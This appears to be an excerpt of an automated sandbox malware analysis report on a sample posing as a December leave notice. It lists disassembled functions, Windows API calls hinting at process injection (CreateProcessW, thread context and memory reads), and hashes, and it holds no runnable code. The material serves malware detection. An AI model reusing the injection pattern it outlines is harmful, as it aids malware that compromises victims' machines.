                                                      control_flow_graph 1286 f851af-f851c5 1287 f851cb-f851e0 call f86b0f 1286->1287 1288 f852a2-f852a6 1286->1288 1291 ff3ca1-ff3cb0 LoadStringW 1287->1291 1292 f851e6-f85206 call f86a63 1287->1292 1295 ff3cbb-ff3cd3 call f8510d call f84db1 1291->1295 1292->1295 1296 f8520c-f85210 1292->1296 1306 f85220-f8529d call fa0d50 call f850e6 call fa0d23 Shell_NotifyIconW call f8cb37 1295->1306 1308 ff3cd9-ff3cf7 call f8518c call f84db1 call f8518c 1295->1308 1298 f85216-f8521b call f8510d 1296->1298 1299 f852a7-f852b0 call f86eed 1296->1299 1298->1306 1299->1306 1306->1288 1308->1306
                                                      APIs
                                                      • _memset.LIBCMT ref: 00F8522F
                                                      • _wcscpy.LIBCMT ref: 00F85283
                                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00F85293
                                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00FF3CB0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                                      • String ID: Line:
                                                      • API String ID: 1053898822-1585850449
                                                      • Opcode ID: cb0fbd8658d4931dc57483cedc3f3da8e2af7e569664a0345f30aab96a9d8122
                                                      • Instruction ID: de49a40b8fb25e51b0809154c5e7a84efbfc1390d5eb0e492665d33a71147963
                                                      • Opcode Fuzzy Hash: cb0fbd8658d4931dc57483cedc3f3da8e2af7e569664a0345f30aab96a9d8122
                                                      • Instruction Fuzzy Hash: 3D31ADB2508740ABC735FBA0EC86FDA77D8AF44710F00451EF5C596091EFB8A648AB96
                                                      Function 00F84139 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 258COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F841A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00F839FE,?,00000001), ref: 00F841DB
                                                      • _free.LIBCMT ref: 00FF36B7
                                                      • _free.LIBCMT ref: 00FF36FE
                                                        • Part of subcall function 00F8C833: __wsplitpath.LIBCMT ref: 00F8C93E
                                                        • Part of subcall function 00F8C833: _wcscpy.LIBCMT ref: 00F8C953
                                                        • Part of subcall function 00F8C833: _wcscat.LIBCMT ref: 00F8C968
                                                        • Part of subcall function 00F8C833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 00F8C978
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                                      • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                      • API String ID: 805182592-1757145024
                                                      • Opcode ID: 5a2553984d6043abf731955179d1d871854df8f4f0e4772c46901d8b9673e65c
                                                      • Instruction ID: 5d9bc3f765d1f4eeb5e15d9849b6d105355b62ed86f43f8e0e2dc763f2c21edb
                                                      • Opcode Fuzzy Hash: 5a2553984d6043abf731955179d1d871854df8f4f0e4772c46901d8b9673e65c
                                                      • Instruction Fuzzy Hash: 9B914171910219AFCF04EFA4CC919FDB7B4BF58310F144429F516EB2A1DB74AA45EB90
                                                      Function 00F84A30 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 138COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F85374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,01041148,?,00F861FF,?,00000000,00000001,00000000), ref: 00F85392
                                                        • Part of subcall function 00F849FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00F84A1D
                                                      • _wcscat.LIBCMT ref: 00FF2D80
                                                      • _wcscat.LIBCMT ref: 00FF2DB5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: _wcscat$FileModuleNameOpen
                                                      • String ID: \$\Include\
                                                      • API String ID: 3592542968-2640467822
                                                      • Opcode ID: 673f367e1982707818516e746aa69b9c7706dc93afd60a22eb6a518d95f14dd4
                                                      • Instruction ID: 65d090006b4dc9bf801d67f096cceddcd7642d11576740f0846bddcc9a18f588
                                                      • Opcode Fuzzy Hash: 673f367e1982707818516e746aa69b9c7706dc93afd60a22eb6a518d95f14dd4
                                                      • Instruction Fuzzy Hash: C45162BD6043409BC324EF55FAC18AEB7F4BFA9310B40452EF68493265DB399544DB51
                                                      Function 00FA34AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __getstream.LIBCMT ref: 00FA34FE
                                                        • Part of subcall function 00FA7C0E: __getptd_noexit.LIBCMT ref: 00FA7C0E
                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 00FA3539
                                                      • __wopenfile.LIBCMT ref: 00FA3549
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                      • String ID: <G
                                                      • API String ID: 1820251861-2138716496
                                                      • Opcode ID: faf16f10fd0720a45b7997db3148d168df05255265b80627b9a4717c1e4be13b
                                                      • Instruction ID: 4fcc560a4c2082d35e98ce8a2846abb4fd7bb9569780778bfefcfb08b61e7b32
                                                      • Opcode Fuzzy Hash: faf16f10fd0720a45b7997db3148d168df05255265b80627b9a4717c1e4be13b
                                                      • Instruction Fuzzy Hash: 9211CAF1E003069FDB11FF759C4266E76A4AF4B360B198525F815DB181EB38CA11B7A1
                                                      Function 00F9D298 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00F9D28B,SwapMouseButtons,00000004,?), ref: 00F9D2BC
                                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00F9D28B,SwapMouseButtons,00000004,?,?,?,?,00F9C865), ref: 00F9D2DD
                                                      • RegCloseKey.KERNELBASE(00000000,?,?,00F9D28B,SwapMouseButtons,00000004,?,?,?,?,00F9C865), ref: 00F9D2FF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: CloseOpenQueryValue
                                                      • String ID: Control Panel\Mouse
                                                      • API String ID: 3677997916-824357125
                                                      • Opcode ID: cc1d807544f83c774fde0878719fc294fbebb51810ac155e41a8f59d65f1ebc0
                                                      • Instruction ID: ec86d2e9fc9dca09350708c3f387056cb68ecdd754b6abc562e0dc571cf19657
                                                      • Opcode Fuzzy Hash: cc1d807544f83c774fde0878719fc294fbebb51810ac155e41a8f59d65f1ebc0
                                                      • Instruction Fuzzy Hash: 13113975A11208BFEF218FA8C884EAF7BBCEF54755F204469F805D7110E631AE41AB60
                                                      Function 01A4B080 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 01A4B83B
                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01A4B8D1
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01A4B8F3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130782459.0000000001A49000.00000040.00000020.00020000.00000000.sdmp, Offset: 01A49000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1a49000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                      • String ID:
                                                      • API String ID: 2438371351-0
                                                      • Opcode ID: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
                                                      • Instruction ID: 0a69e073a8706fb794719519afa96fc45756a91c6b9010afe1646d2aa7da633e
                                                      • Opcode Fuzzy Hash: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
                                                      • Instruction Fuzzy Hash: 4962FD30A14258DBEB24CFA4C850BDEB776EF98300F1091A9D10DEB395E7759E81CB69
                                                      Function 00FCC396 Relevance: 6.2, APIs: 4, Instructions: 154COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F84517: _fseek.LIBCMT ref: 00F8452F
                                                        • Part of subcall function 00FCC56D: _wcscmp.LIBCMT ref: 00FCC65D
                                                        • Part of subcall function 00FCC56D: _wcscmp.LIBCMT ref: 00FCC670
                                                      • _free.LIBCMT ref: 00FCC4DD
                                                      • _free.LIBCMT ref: 00FCC4E4
                                                      • _free.LIBCMT ref: 00FCC54F
                                                        • Part of subcall function 00FA1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00FA7A85), ref: 00FA1CB1
                                                        • Part of subcall function 00FA1C9D: GetLastError.KERNEL32(00000000,?,00FA7A85), ref: 00FA1CC3
                                                      • _free.LIBCMT ref: 00FCC557
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                      • String ID:
                                                      • API String ID: 1552873950-0
                                                      • Opcode ID: 2db9d723d2f1f24614347a7e6fc8c80c315d14cd5ac174f49895e1fbecc6b5fc
                                                      • Instruction ID: 63461372c5281b57b50f6059e3dcf5fc980c7b6c8578311adc5946fe25bfa38b
                                                      • Opcode Fuzzy Hash: 2db9d723d2f1f24614347a7e6fc8c80c315d14cd5ac174f49895e1fbecc6b5fc
                                                      • Instruction Fuzzy Hash: 25516DB5904219AFDB149F64DC82BEDBBB9FF48310F00049EF608A3241DB756A809F58
                                                      Function 00F9EB83 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 00F9EBB2
                                                        • Part of subcall function 00F851AF: _memset.LIBCMT ref: 00F8522F
                                                        • Part of subcall function 00F851AF: _wcscpy.LIBCMT ref: 00F85283
                                                        • Part of subcall function 00F851AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00F85293
                                                      • KillTimer.USER32(?,00000001,?,?), ref: 00F9EC07
                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00F9EC16
                                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00FF3C88
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                      • String ID:
                                                      • API String ID: 1378193009-0
                                                      • Opcode ID: 34c8061d1f3c49323e812f5a16a502a624e5fe406741671e35910d6a06de9428
                                                      • Instruction ID: d9a685d496864e46104571eb15413f5aa2a916d9b7fe675df9a2c6450b2484fc
                                                      • Opcode Fuzzy Hash: 34c8061d1f3c49323e812f5a16a502a624e5fe406741671e35910d6a06de9428
                                                      • Instruction Fuzzy Hash: 7821F5719047849FEB33DB688859BE7BBEC9F01318F04008DE6CE56242C7B46A84DB51
                                                      Function 00F840E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 00FF3725
                                                      • GetOpenFileNameW.COMDLG32 ref: 00FF376F
                                                        • Part of subcall function 00F8660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F853B1,?,?,00F861FF,?,00000000,00000001,00000000), ref: 00F8662F
                                                        • Part of subcall function 00F840A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00F840C6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Name$Path$FileFullLongOpen_memset
                                                      • String ID: X
                                                      • API String ID: 3777226403-3081909835
                                                      • Opcode ID: d3c598ddc6a787b4330621ed58f2605d5c7ce8f93d04a11f93ce418f837b6e1a
                                                      • Instruction ID: b2106e73e50b4379befe196584428e3aa6645aa3d2a3dfe9bc455ab7e085c70f
                                                      • Opcode Fuzzy Hash: d3c598ddc6a787b4330621ed58f2605d5c7ce8f93d04a11f93ce418f837b6e1a
                                                      • Instruction Fuzzy Hash: E721A4B1A101889BCB15EFD4CC457EE7BF8AF49304F008059E544EB241DBB86A899F65
                                                      Function 00FCC71A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetTempPathW.KERNEL32(00000104,?), ref: 00FCC72F
                                                      • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00FCC746
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Temp$FileNamePath
                                                      • String ID: aut
                                                      • API String ID: 3285503233-3010740371
                                                      • Opcode ID: 0aff4dd18b4f171c6fb217730c64aa27886f4b09afa446011695196127e7caff
                                                      • Instruction ID: 303605269a1ca6932f01c683c50b8e7094968b077021101231ea75b064d26492
                                                      • Opcode Fuzzy Hash: 0aff4dd18b4f171c6fb217730c64aa27886f4b09afa446011695196127e7caff
                                                      • Instruction Fuzzy Hash: 5DD05E7150030EABDB20ABD0DC4EF8A776CA710704F0001A17690A90A1DAB9E6998B64
                                                      Function 00FDF8AE Relevance: 4.9, APIs: 3, Instructions: 385COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c491edb8d155f69e7672336daba640619e04063ae964c5da22d67bcb1c8bb9bf
                                                      • Instruction ID: 8372948cef3bd81541a12f56cd988b07f86ab026a61d335726f5aa45c62f421b
                                                      • Opcode Fuzzy Hash: c491edb8d155f69e7672336daba640619e04063ae964c5da22d67bcb1c8bb9bf
                                                      • Instruction Fuzzy Hash: 05F16C71A043019FC710DF24C881B5AB7E6BF88314F14892EF9969B392D774E949DB82
                                                      Function 00F84FFC Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 00F85022
                                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00F850CB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: IconNotifyShell__memset
                                                      • String ID:
                                                      • API String ID: 928536360-0
                                                      • Opcode ID: abf3e786f206f37bfd138dd206ac1c4b9af5b40c1801f1612ebd538a3e320ecf
                                                      • Instruction ID: 0c0144d0f94ddebe9d68e3b1de065e01e53221c23237e70579ed6a4a44f53292
                                                      • Opcode Fuzzy Hash: abf3e786f206f37bfd138dd206ac1c4b9af5b40c1801f1612ebd538a3e320ecf
                                                      • Instruction Fuzzy Hash: 64319CB1A047019FC731EF64D9856DBBBE8FF48714F00092EF69A82240E776A944DB92
                                                      Function 00FA395C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __FF_MSGBANNER.LIBCMT ref: 00FA3973
                                                        • Part of subcall function 00FA81C2: __NMSG_WRITE.LIBCMT ref: 00FA81E9
                                                        • Part of subcall function 00FA81C2: __NMSG_WRITE.LIBCMT ref: 00FA81F3
                                                      • __NMSG_WRITE.LIBCMT ref: 00FA397A
                                                        • Part of subcall function 00FA821F: GetModuleFileNameW.KERNEL32(00000000,01040312,00000104,00000000,00000001,00000000), ref: 00FA82B1
                                                        • Part of subcall function 00FA821F: ___crtMessageBoxW.LIBCMT ref: 00FA835F
                                                        • Part of subcall function 00FA1145: ___crtCorExitProcess.LIBCMT ref: 00FA114B
                                                        • Part of subcall function 00FA1145: ExitProcess.KERNEL32 ref: 00FA1154
                                                        • Part of subcall function 00FA7C0E: __getptd_noexit.LIBCMT ref: 00FA7C0E
                                                      • RtlAllocateHeap.NTDLL(01840000,00000000,00000001,00000001,00000000,?,?,00F9F507,?,0000000E), ref: 00FA399F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                      • String ID:
                                                      • API String ID: 1372826849-0
                                                      • Opcode ID: 3c0c347c565f748be81c4a6c0e7116029185efc9f3195bd2f889140285ba3bd8
                                                      • Instruction ID: d01bc3f4c7e0516ac865027d03ab5bd8456ee60ff5dc074441e2645db06d79c5
                                                      • Opcode Fuzzy Hash: 3c0c347c565f748be81c4a6c0e7116029185efc9f3195bd2f889140285ba3bd8
                                                      • Instruction Fuzzy Hash: 9501B5FA745311ABE6213B68EC42B6B33599F8B770F210025F905DB185DFF9DD01A6A0
                                                      Function 00FCC6D9 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00FCC385,?,?,?,?,?,00000004), ref: 00FCC6F2
                                                      • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00FCC385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00FCC708
                                                      • CloseHandle.KERNEL32(00000000,?,00FCC385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00FCC70F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: File$CloseCreateHandleTime
                                                      • String ID:
                                                      • API String ID: 3397143404-0
                                                      • Opcode ID: 40a8901ecbeaa71c0aa462e0f23dbcc3055c8f24536163501f6f387b68a0a7a3
                                                      • Instruction ID: 4a260933cf895ebc197ba70d297e6cc50a79dabcae67c4491086e7d72cab0bd5
                                                      • Opcode Fuzzy Hash: 40a8901ecbeaa71c0aa462e0f23dbcc3055c8f24536163501f6f387b68a0a7a3
                                                      • Instruction Fuzzy Hash: CDE0E632181214B7D7321BD4AC0AFCA7F59EB05B71F104210FB55690D197B6655197A8
                                                      Function 00FCBB64 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _free.LIBCMT ref: 00FCBB72
                                                        • Part of subcall function 00FA1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00FA7A85), ref: 00FA1CB1
                                                        • Part of subcall function 00FA1C9D: GetLastError.KERNEL32(00000000,?,00FA7A85), ref: 00FA1CC3
                                                      • _free.LIBCMT ref: 00FCBB83
                                                      • _free.LIBCMT ref: 00FCBB95
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
